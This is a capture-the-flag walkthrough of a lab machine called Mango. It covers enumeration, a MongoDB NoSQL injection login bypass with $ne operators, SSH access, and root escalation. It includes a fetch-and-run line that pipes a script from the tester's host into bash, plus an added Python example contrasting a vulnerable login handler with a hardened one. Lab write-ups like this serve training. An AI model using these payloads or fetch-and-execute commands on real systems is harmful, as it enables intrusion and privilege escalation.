Mango is a good Linux-based machine for improving your enumeration skills; you might learn some new things from it.
nmap -sC -sV 10.10.10.162
Opening the host in our browser on port 80, we are presented with a 403 Forbidden error, so we tried opening the host on port 443 and got this.
This looks like a search engine, so let’s check the source code.
After looking at the source code, we couldn’t find anything there.
Let’s check the nmap report again.
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
Adding this to our
$ echo "10.10.10.162 staging-order.mango.htb" >> /etc/hosts
We can browse
Here we can see a login panel like this
After trying random credentials we got nothing.
Here, Mango could be wordplay on MongoDB.
MongoDB is a NoSQL database, so to exploit it we need to search for MongoDB NoSQL injection.
To confirm this, we went to this GitHub repo and tried an authentication bypass.
Basic authentication bypass using not equal ($ne) or greater ($gt)
In response we got
HTTP/1.1 302 Found
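The bypass works when a login handler passes request parameters into the MongoDB query without checking their type. The following is an added example, not code from this writeup or from the target application, showing that flaw beside a hardened check. It assumes PHP-style decoding of bracketed parameters, and the user record, matcher and function names are hypothetical stand-ins.

```python
from urllib.parse import parse_qsl

# Constructed sample record standing in for the MongoDB users collection.
USERS = [{"username": "alice", "password": "S3cret!"}]

def php_style_params(body):
    """Assumed decoding: key[sub]=v becomes {key: {sub: v}}, as PHP does."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            name, sub = key[:-1].split("[", 1)
            slot = params.setdefault(name, {})
            if isinstance(slot, dict):
                slot[sub] = value
        else:
            params[key] = value
    return params

def matches(doc_value, cond):
    """Minimal stand-in for MongoDB matching: equality plus $ne and $gt."""
    if not isinstance(cond, dict):
        return doc_value == cond
    ops = {"$ne": lambda a, b: a != b, "$gt": lambda a, b: a > b}
    return all(op in ops and ops[op](doc_value, arg) for op, arg in cond.items())

def find_user(query):
    return next((u for u in USERS
                 if all(matches(u[k], c) for k, c in query.items())), None)

def login_vulnerable(body):
    p = php_style_params(body)
    # Request values go straight into the query, so a nested dict acts as an operator.
    return find_user({"username": p.get("username"),
                      "password": p.get("password")}) is not None

def login_hardened(body):
    p = php_style_params(body)
    user, pwd = p.get("username"), p.get("password")
    # Only plain strings may reach the query; arrays/objects are rejected.
    if not isinstance(user, str) or not isinstance(pwd, str):
        return False
    return find_user({"username": user, "password": pwd}) is not None

if __name__ == "__main__":
    for body in ("username=alice&password=S3cret!",
                 "username[$ne]=x&password[$ne]=x"):
        print(body, login_vulnerable(body), login_hardened(body))
```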
After searching about it, we came across a GitHub repository that can enumerate usernames and passwords of web applications vulnerable to NoSQL (MongoDB) injection.
After running the script, we now have 2 credentials.
We can connect as the user mango over SSH with the password we got earlier.
#ssh email@example.com
firstname.lastname@example.org's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage

System information as of Fri Apr 17 05:33:13 UTC 2020

System load: 0.12 Processes: 117
Usage of /: 25.9% of 19.56GB Users logged in: 1
Memory usage: 16% IP address for ens33: 10.10.10.162
Swap usage: 4%

Canonical Livepatch is available for installation.
Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Apr 17 05:14:54 2020 from 10.10.15.51
We got the shell.
There is nothing here for this user and we can’t find a user flag. We checked the home folder to find the flag under another user, but couldn’t get into it.
But we have an admin password, so let’s try to switch from mango to admin with the password we got previously.
mango@mango:~$ su admin
Password:
$ whoami
admin
$ cat /home/admin/user.txt
79bf3[redacted]47e92
Now the main part is to get the root flag.
To get an idea for privilege escalation we can run LinEnum here.
curl 10.10.15.51:80/LinEnum.sh | bash
Reading the output of LinEnum, we saw this line
We searched for this on Google and saw this
We can print root.txt from this
We got the root flag, but we still don’t have a root shell; we can write our SSH public key to authorized_keys to get SSH access as root.
You can print root.txt or get a root shell by using the -scripting flag.
To get a shell you can use the same method.
Here we got our root shell.
Hope you like it.